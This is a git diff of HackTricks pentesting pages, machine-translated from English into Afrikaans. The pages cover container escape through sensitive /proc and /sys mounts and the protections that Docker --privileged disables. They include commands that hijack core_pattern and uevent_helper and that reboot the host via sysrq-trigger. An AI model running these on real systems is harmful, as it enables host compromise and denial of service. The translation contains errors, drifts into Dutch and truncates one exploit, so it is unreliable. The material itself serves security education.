-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md index 03def5893..3d8174f27 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md @@ -1,154 +1,143 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-The exposure of `/proc` and `/sys` without proper namespace isolation introduces significant security risks, including attack surface enlargement and information disclosure. These directories contain sensitive files that, if misconfigured or accessed by an unauthorized user, can lead to container escape, host modification, or provide information aiding further attacks. For instance, incorrectly mounting `-v /proc:/host/proc` can bypass AppArmor protection due to its path-based nature, leaving `/host/proc` unprotected. +Die blootstelling van `/proc` en `/sys` sonder behoorlike naamsruimte-isolasie stel beduidende sekuriteitsrisiko's in, insluitend vergroting van die aanvalsvlak en bekendmaking van inligting. Hierdie gids bevat sensitiewe lêers wat, as dit verkeerd gekonfigureer of deur 'n ongemagtigde gebruiker benader word, kan lei tot ontsnapping uit die houer, wysiging van die gasheer of die voorsiening van inligting wat verdere aanvalle ondersteun. Byvoorbeeld, as `-v /proc:/host/proc` verkeerd gemonteer word, kan dit AppArmor-beskerming omseil as gevolg van sy padgebaseerde aard, wat `/host/proc` onbeskerm laat. -**You can find further details of each potential vuln in [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts).** +**U kan verdere besonderhede van elke potensiële kwesbaarheid vind in [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts).** -# procfs Vulnerabilities +# procfs-kwesbaarhede ## `/proc/sys` -This directory permits access to modify kernel variables, usually via `sysctl(2)`, and contains several subdirectories of concern: +Hierdie gids maak toegang tot die wysiging van kernel-veranderlikes moontlik, gewoonlik via `sysctl(2)`, en bevat verskeie subgidsies van belang: -### **`/proc/sys/kernel/core_pattern`** - - Described in [core(5)](https://man7.org/linux/man-pages/man5/core.5.html). - - Allows defining a program to execute on core-file generation with the first 128 bytes as arguments. This can lead to code execution if the file begins with a pipe `|`. - - **Testing and Exploitation Example**: - ```bash - [ -w /proc/sys/kernel/core_pattern ] && echo Yes # Test write access - cd /proc/sys/kernel - echo "|$overlay/shell.sh" > core_pattern # Set custom handler - sleep 5 && ./crash & # Trigger handler - ``` +### **`/proc/sys/kernel/core_pattern`** +- Beskryf in [core(5)](https://man7.org/linux/man-pages/man5/core.5.html). +- Maak dit moontlik om 'n program te definieer wat uitgevoer moet word wanneer 'n kernlêer gegenereer word, met die eerste 128 byte as argumente. Dit kan lei tot kodering van kode as die lêer begin met 'n pyp `|`. +- **Toets- en uitbuitingsvoorbeeld**: +```bash +[ -w /proc/sys/kernel/core_pattern ] && echo Ja # Toets skryftoegang +cd /proc/sys/kernel +echo "|$overlay/shell.sh" > core_pattern # Stel aangepaste hanterer in +sleep 5 && ./crash & # Trigger hanterer +``` ### **`/proc/sys/kernel/modprobe`** - - Detailed in [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). - - Contains the path to the kernel module loader, invoked for loading kernel modules. - - **Checking Access Example**: - ```bash - ls -l $(cat /proc/sys/kernel/modprobe) # Check access to modprobe - ``` +- Uitvoerig beskryf in [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). +- Bevat die pad na die kernel-modulelaaier wat aangeroep word vir die laai van kernel-modules. +- **Voorbeeld van toegangstoets**: +```bash +ls -l $(cat /proc/sys/kernel/modprobe) # Toets toegang tot modprobe +``` ### **`/proc/sys/vm/panic_on_oom`** - - Referenced in [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). - - A global flag that controls whether the kernel panics or invokes the OOM killer when an OOM condition occurs. +- Verwys na [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). +- 'n Globale vlag wat beheer of die kernel paniekerig word of die OOM-killer aanroep wanneer 'n OOM-toestand voorkom. ### **`/proc/sys/fs`** - - As per [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html), contains options and information about the file system. - - Write access can enable various denial-of-service attacks against the host. +- Volgens [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html), bevat dit opsies en inligting oor die lêersisteem. +- Skryftoegang kan verskeie denial-of-service-aanvalle teen die gasheer moontlik maak. ### **`/proc/sys/fs/binfmt_misc`** - - Allows registering interpreters for non-native binary formats based on their magic number. - - Can lead to privilege escalation or root shell access if `/proc/sys/fs/binfmt_misc/register` is writable. - - Relevant exploit and explanation: - - [Poor man's rootkit via binfmt_misc](https://github.com/toffan/binfmt_misc) - - In-depth tutorial: [Video link](https://www.youtube.com/watch?v=WBC7hhgMvQQ) +- Maak die registrasie van tolke vir nie-inheemse binêre formate moontlik op grond van hul toorkodegetal. +- Dit kan lei tot bevoorregte eskalasie of toegang tot die wortelshell as `/proc/sys/fs/binfmt_misc/register` skryfbaar is. +- Relevant uitbuiting en verduideliking: +- [Poor man's rootkit via binfmt_misc](https://github.com/toffan/binfmt_misc) +- Diepgaande tutoriaal: [Video-skakel](https://www.youtube.com/watch?v=WBC7hhgMvQQ) -## Others in `/proc` +## Ander in `/proc` ### **`/proc/config.gz`** - - May reveal the kernel configuration if `CONFIG_IKCONFIG_PROC` is enabled. - - Useful for attackers to identify vulnerabilities in the running kernel. +- Kan die kernel-konfigurasie bekend maak as `CONFIG_IKCONFIG_PROC` geaktiveer is. +- Nuttig vir aanvallers om kwesbaarhede in die lopende kernel te identifiseer. ### **`/proc/sysrq-trigger`** - - Allows invoking Sysrq commands, potentially causing immediate system reboots or other critical actions. - - **Rebooting Host Example**: - ```bash - echo b > /proc/sysrq-trigger # Reboots the host - ``` +- Maak dit moontlik om Sysrq-opdragte aan te roep, wat potensieel onmiddellike stelselherlaaiings of ander kritieke aksies kan veroorsaak. +- **Voorbeeld van gasheerherlaaiing**: +```bash +echo b > /proc/sysrq-trigger # Herlaai die gasheer +``` ### **`/proc/kmsg`** - - Exposes kernel ring buffer messages. - - Can aid in kernel exploits, address leaks, and provide sensitive system information. +- Stel kernel-ringingbufferboodskappe bloot. +- Dit kan help met kernel-uitbuitings, adreslekke en die voorsiening van sensitiewe stelselinligting. ### **`/proc/kallsyms`** - - Lists kernel exported symbols and their addresses. - - Essential for kernel exploit development, especially for overcoming KASLR. - - Address information is restricted with `kptr_restrict` set to `1` or `2`. - - Details in [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). +- Lys kernel-uitgevoerde simbole en hul adresse op. +- Essensieel vir die ontwikkeling van kernel-uitbuitings, veral vir die oorkom van KASLR. +- Adresinligting is beperk met `kptr_restrict` wat op `1` of `2` ingestel is. +- Besonderhede in [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). ### **`/proc/[pid]/mem`** - - Interfaces with the kernel memory device `/dev/mem`. - - Historically vulnerable to privilege escalation attacks. - - More on [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). +- Koppelvlak met die kernel-geheue-toestel `/dev/mem`. +- Histories vatbaar vir bevoorregte eskalasie-aanvalle. +- Meer inligting in [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). ### **`/proc/kcore`** - - Represents the system's physical memory in ELF core format. - - Reading can leak host system and other containers' memory contents. - - Large file size can lead to reading issues or software crashes. - - Detailed usage in [Dumping /proc/kcore in 2019](https://schlafwandler.github.io/posts/dumping-/proc/kcore/). +- Verteenwoordig die fisiese geheue van die stelsel in ELF-kernformaat. +- Lees kan die inhoud van die gasheerstelsel en ander houers se geheue uitlek. +- 'n Groot lêergrootte kan lei tot leesprobleme of sagtewarefoutmeldings. +- Gedetailleerde gebruik in [Dumping /proc/kcore in 2019](https://schlafwandler.github.io/posts/dumping-/proc/kcore/). ### **`/proc/kmem`** - - Alternate interface for `/dev/kmem`, representing kernel virtual memory. - - Allows reading and writing, hence direct modification of kernel memory. +- Alternatiewe koppelvlak vir `/dev/kmem`, wat die virtuele geheue van die kernel verteenwoordig. +- Maak lees en skryf moontlik, dus direkte wysiging van die kernel-geheue. ### **`/proc/mem`** - - Alternate interface for `/dev/mem`, representing physical memory. - - Allows reading and writing, modification of all memory requires resolving virtual to physical addresses. +- Alternatiewe koppelvlak vir `/dev/mem`, wat fisiese geheue verteenwoordig. +- Maak lees en skryf moontlik, wysiging van alle geheue vereis die oplossing van virtuele na fisiese adresse. ### **`/proc/sched_debug`** - - Returns process scheduling information, bypassing PID namespace protections. - - Exposes process names, IDs, and cgroup identifiers. +- Gee prosesbeplanningsinligting terug, omseil PID-naamsruimtebeskerming. +- Stel prosesname, ID's en cgroup-identifiseerders bloot. ### **`/proc/[pid]/mountinfo`** - - Provides information about mount points in the process's mount namespace. - - Exposes the location of the container `rootfs` or image. +- Verskaf inligting oor koppelvlakpunte in die proses se koppelvlaknaamsruimte. +- Stel die ligging van die houer se `rootfs` of beeld bloot. -## `/sys` Vulnerabilities +## `/sys`-kwesbaarhede ### **`/sys/kernel/uevent_helper`** - - Used for handling kernel device `uevents`. - - Writing to `/sys/kernel/uevent_helper` can execute arbitrary scripts upon `uevent` triggers. - - **Example for Exploitation**: - %%%bash - # Creates a payload - echo "#!/bin/sh" > /evil-helper - echo "ps > /output" >> /evil-helper - chmod +x /evil-helper - # Finds host path from OverlayFS mount for container - host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab) - # Sets uevent_helper to malicious helper - echo "$host_path/evil-helper" > /sys/kernel/uevent_helper - # Triggers a uevent - echo change > /sys/class/mem/null/uevent - # Reads the output - cat /output - %%% - +- Word gebruik vir die hanteer van kerneltoestel-`uevents`. +- Skryf na `/sys/kernel/uevent_helper` kan arbitrêre skripte uitvoer wanneer `uevent`-triggerings plaasvind. +- **Voorbeeld van uitbuiting**: +%%%bash +# Skep 'n vragstuk +echo "#!/bin/sh" > /evil-helper +echo "ps > /output" >> /evil-helper +chmod +x /evil-helper +# Vind gasheerpad vanaf OverlayFS-koppeling vir houer ### **`/sys/class/thermal`** - - Controls temperature settings, potentially causing DoS attacks or physical damage. +- Beheer temperatuurinstellings, moontlik veroorsaak DoS-aanvalle of fisiese skade. ### **`/sys/kernel/vmcoreinfo`** - - Leaks kernel addresses, potentially compromising KASLR. +- Lekker kernel-adresse, moontlik in gedrang KASLR. ### **`/sys/kernel/security`** - - Houses `securityfs` interface, allowing configuration of Linux Security Modules like AppArmor. - - Access might enable a container to disable its MAC system. +- Bevat `securityfs`-koppelvlak, wat konfigurasie van Linux Security Modules soos AppArmor moontlik maak. +- Toegang kan 'n houer in staat stel om sy MAC-stelsel uit te skakel. -### **`/sys/firmware/efi/vars` and `/sys/firmware/efi/efivars`** - - Exposes interfaces for interacting with EFI variables in NVRAM. - - Misconfiguration or exploitation can lead to bricked laptops or unbootable host machines. +### **`/sys/firmware/efi/vars` en `/sys/firmware/efi/efivars`** +- Blootstelling van koppelvlakke vir interaksie met EFI-variables in NVRAM. +- Foutiewe konfigurasie of uitbuiting kan lei tot gebreekte draagbare rekenaars of onopstartbare gasheer-masjiene. ### **`/sys/kernel/debug`** - - `debugfs` offers a "no rules" debugging interface to the kernel. - - History of security issues due to its unrestricted nature. +- `debugfs` bied 'n "geen reëls" foutopsporingskoppelvlak na die kernel. +- Geskiedenis van sekuriteitsprobleme as gevolg van sy onbeperkte aard. -## References +## Verwysings * [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts) * [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf) * [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf) @@ -156,16 +145,14 @@ This directory permits access to modify kernel variables, usually via `sysctl(2)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien jou **maatskappy geadverteer in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/linux-hardening/privilege-escalation/docker-security/docker-privileged.md b/linux-hardening/privilege-escalation/docker-security/docker-privileged.md index 8020c2f2a..033453588 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-privileged.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-privileged.md @@ -1,27 +1,27 @@ -# Docker --privileged +# Docker --bevoorreg
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## What Affects +## Wat Affekteer Dit -When you run a container as privileged these are the protections you are disabling: +Wanneer jy 'n houer as bevoorreg uitvoer, word hierdie beskermings gedeaktiveer: -### Mount /dev +### Monteer /dev -In a privileged container, all the **devices can be accessed in `/dev/`**. Therefore you can **escape** by **mounting** the disk of the host. +In 'n bevoorregte houer kan **alle toestelle in `/dev/`** benader word. Jy kan dus **ontsnap** deur die skandering van die bediener se skyf te **monteer**. {% tabs %} -{% tab title="Inside default container" %} +{% tab title="Binne standaard houer" %} ```bash # docker run --rm -it alpine sh ls /dev @@ -30,7 +30,7 @@ core full null pts shm stdin tty zero ``` {% endtab %} -{% tab title="Inside Privileged Container" %} +{% tab title="Binne die Bevoorregte Houer" %} ```bash # docker run --rm --privileged -it alpine sh ls /dev @@ -43,12 +43,12 @@ cpu nbd0 pts stdout tty27 {% endtab %} {% endtabs %} -### Read-only kernel file systems +### Lees-slegs kernel-lêerstelsels -Kernel file systems provide a mechanism for a process to modify the behavior of the kernel. However, when it comes to container processes, we want to prevent them from making any changes to the kernel. Therefore, we mount kernel file systems as **read-only** within the container, ensuring that the container processes cannot modify the kernel. +Kernel-lêerstelsels bied 'n meganisme vir 'n proses om die gedrag van die kernel te wysig. Tog wil ons voorkom dat houerprosesse enige veranderinge aan die kernel maak. Daarom monteer ons kernel-lêerstelsels as **lees-slegs** binne die houer, om te verseker dat die houerprosesse die kernel nie kan wysig nie. {% tabs %} -{% tab title="Inside default container" %} +{% tab title="Binne die verstekhouer" %} ```bash # docker run --rm -it alpine sh mount | grep '(ro' @@ -59,7 +59,7 @@ cpuacct on /sys/fs/cgroup/cpuacct type cgroup (ro,nosuid,nodev,noexec,relatime,c ``` {% endtab %} -{% tab title="Inside Privileged Container" %} +{% tab title="Binne die Bevoorregte Houer" %} ```bash # docker run --rm --privileged -it alpine sh mount | grep '(ro' @@ -67,16 +67,16 @@ mount | grep '(ro' {% endtab %} {% endtabs %} -### Masking over kernel file systems +### Maskering oor kernel-lêersisteme -The **/proc** file system is selectively writable but for security, certain parts are shielded from write and read access by overlaying them with **tmpfs**, ensuring container processes can't access sensitive areas. +Die **/proc**-lêersisteem is selektief skryfbaar, maar vir sekuriteit is sekere dele beskerm teen skryf- en leestoegang deur dit met **tmpfs** te oorlê, wat verseker dat houerprosesse nie toegang tot sensitiewe areas kan verkry nie. {% hint style="info" %} -**tmpfs** is a file system that stores all the files in virtual memory. tmpfs doesn't create any files on your hard drive. So if you unmount a tmpfs file system, all the files residing in it are lost for ever. +**tmpfs** is 'n lêersisteem wat al die lêers in virtuele geheue stoor. tmpfs skep geen lêers op jou harde skyf nie. As jy 'n tmpfs-lêersisteem ontlaai, gaan al die lêers wat daarin woon, vir ewig verlore. {% endhint %} {% tabs %} -{% tab title="Inside default container" %} +{% tab title="Binne die verstekhouer" %} ```bash # docker run --rm -it alpine sh mount | grep /proc.*tmpfs @@ -86,7 +86,7 @@ tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755) ``` {% endtab %} -{% tab title="Inside Privileged Container" %} +{% tab title="Binne die Bevoorregte Houer" %} ```bash # docker run --rm --privileged -it alpine sh mount | grep /proc.*tmpfs @@ -94,16 +94,16 @@ mount | grep /proc.*tmpfs {% endtab %} {% endtabs %} -### Linux capabilities +### Linux-vermoëns -Container engines launch the containers with a **limited number of capabilities** to control what goes on inside of the container by default. **Privileged** ones have **all** the **capabilities** accesible. To learn about capabilities read: +Houer-enjins begin die houers met 'n **beperkte aantal vermoëns** om te beheer wat binne die houer gebeur. **Bevoorregte** eenhede het **alle** die **vermoëns** toeganklik. Om meer te leer oor vermoëns, lees: {% content-ref url="../linux-capabilities.md" %} [linux-capabilities.md](../linux-capabilities.md) {% endcontent-ref %} {% tabs %} -{% tab title="Inside default container" %} +{% tab title="Binne die verstekhouer" %} ```bash # docker run --rm -it alpine sh apk add -U libcap; capsh --print @@ -114,7 +114,7 @@ Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setg ``` {% endtab %} -{% tab title="Inside Privileged Container" %} +{% tab title="Binne die Bevoorregte Houer" %} ```bash # docker run --rm --privileged -it alpine sh apk add -U libcap; capsh --print @@ -126,18 +126,18 @@ Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fset {% endtab %} {% endtabs %} -You can manipulate the capabilities available to a container without running in `--privileged` mode by using the `--cap-add` and `--cap-drop` flags. +Jy kan die vermoëns wat beskikbaar is vir 'n houer manipuleer sonder om in `--privileged`-modus te loop deur die `--cap-add` en `--cap-drop` vlae te gebruik. ### Seccomp -**Seccomp** is useful to **limit** the **syscalls** a container can call. A default seccomp profile is enabled by default when running docker containers, but in privileged mode it is disabled. Learn more about Seccomp here: +**Seccomp** is nuttig om die **syscalls** wat 'n houer kan aanroep, te **beperk**. 'n Standaard seccomp-profiel is standaard geaktiveer wanneer docker-houers uitgevoer word, maar in bevoorregte modus is dit gedeaktiveer. Lees meer oor Seccomp hier: {% content-ref url="seccomp.md" %} [seccomp.md](seccomp.md) {% endcontent-ref %} {% tabs %} -{% tab title="Inside default container" %} +{% tab title="Binne die standaard houer" %} ```bash # docker run --rm -it alpine sh grep Seccomp /proc/1/status @@ -146,7 +146,7 @@ Seccomp_filters: 1 ``` {% endtab %} -{% tab title="Inside Privileged Container" %} +{% tab title="Binne die Bevoorregte Houer" %} ```bash # docker run --rm --privileged -it alpine sh grep Seccomp /proc/1/status @@ -155,86 +155,80 @@ Seccomp_filters: 0 ``` {% endtab %} {% endtabs %} - ```bash # You can manually disable seccomp in docker with --security-opt seccomp=unconfined ``` - -Also, note that when Docker (or other CRIs) are used in a **Kubernetes** cluster, the **seccomp filter is disabled by default** +Verder moet daarop gelet word dat wanneer Docker (of ander CRIs) in 'n **Kubernetes**-groep gebruik word, die **seccomp-filter standaard gedeaktiveer** is. ### AppArmor -**AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**. When you run with the `--privileged` flag, this protection is disabled. +**AppArmor** is 'n kernel-verbetering om **houers** tot 'n **beperkte** stel **hulpbronne** met **per-program profiele** te beperk. Wanneer jy met die `--privileged` vlag hardloop, word hierdie beskerming gedeaktiveer. {% content-ref url="apparmor.md" %} [apparmor.md](apparmor.md) {% endcontent-ref %} - ```bash # You can manually disable seccomp in docker with --security-opt apparmor=unconfined ``` - ### SELinux -Running a container with the `--privileged` flag disables **SELinux labels**, causing it to inherit the label of the container engine, typically `unconfined`, granting full access similar to the container engine. In rootless mode, it uses `container_runtime_t`, while in root mode, `spc_t` is applied. +Die uitvoer van 'n houer met die `--privileged` vlag deaktiveer **SELinux-etikette**, wat veroorsaak dat dit die etiket van die houermotor erf, tipies `unconfined`, wat volle toegang gee soortgelyk aan die houermotor. In rootless-modus gebruik dit `container_runtime_t`, terwyl in root-modus `spc_t` toegepas word. {% content-ref url="../selinux.md" %} [selinux.md](../selinux.md) {% endcontent-ref %} - ```bash # You can manually disable selinux in docker with --security-opt label:disable ``` - -## What Doesn't Affect +## Wat nie beïnvloed word nie ### Namespaces -Namespaces are **NOT affected** by the `--privileged` flag. Even though they don't have the security constraints enabled, they **do not see all of the processes on the system or the host network, for example**. Users can disable individual namespaces by using the **`--pid=host`, `--net=host`, `--ipc=host`, `--uts=host`** container engines flags. +Namespaces word **NIET beïnvloed** deur die `--privileged` vlag. Alhoewel hulle nie die sekuriteitsbeperkings geaktiveer het nie, **sien hulle nie al die prosesse op die stelsel of die gasheer-netwerk nie, byvoorbeeld**. Gebruikers kan individuele namespaces deaktiveer deur die **`--pid=host`, `--net=host`, `--ipc=host`, `--uts=host`** kontainer-enjin vlae te gebruik. {% tabs %} -{% tab title="Inside default privileged container" %} +{% tab title="Binne die standaard bevoorregte houer" %} ```bash # docker run --rm --privileged -it alpine sh ps -ef PID USER TIME COMMAND - 1 root 0:00 sh - 18 root 0:00 ps -ef +1 root 0:00 sh +18 root 0:00 ps -ef ``` {% endtab %} -{% tab title="Inside --pid=host Container" %} +{% tab title="Binne --pid=host Houer" %} ```bash # docker run --rm --privileged --pid=host -it alpine sh ps -ef PID USER TIME COMMAND - 1 root 0:03 /sbin/init - 2 root 0:00 [kthreadd] - 3 root 0:00 [rcu_gp]ount | grep /proc.*tmpfs +1 root 0:03 /sbin/init +2 root 0:00 [kthreadd] +3 root 0:00 [rcu_gp]ount | grep /proc.*tmpfs [...] ``` {% endtab %} {% endtabs %} -### User namespace +### Gebruikersnaamruimte -**By default, container engines don't utilize user namespaces, except for rootless containers**, which require them for file system mounting and using multiple UIDs. User namespaces, integral for rootless containers, cannot be disabled and significantly enhance security by restricting privileges. +**Standaard maak container-engines geen gebruik van gebruikersnaamruimtes, behalve voor rootless containers**, die ze nodig hebben voor het koppelen van bestandssystemen en het gebruik van meerdere UID's. Gebruikersnaamruimtes, die essentieel zijn voor rootless containers, kunnen niet worden uitgeschakeld en verbeteren de beveiliging aanzienlijk door privileges te beperken. -## References +## Verwysings * [https://www.redhat.com/sysadmin/privileged-flag-container-engines](https://www.redhat.com/sysadmin/privileged-flag-container-engines)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk 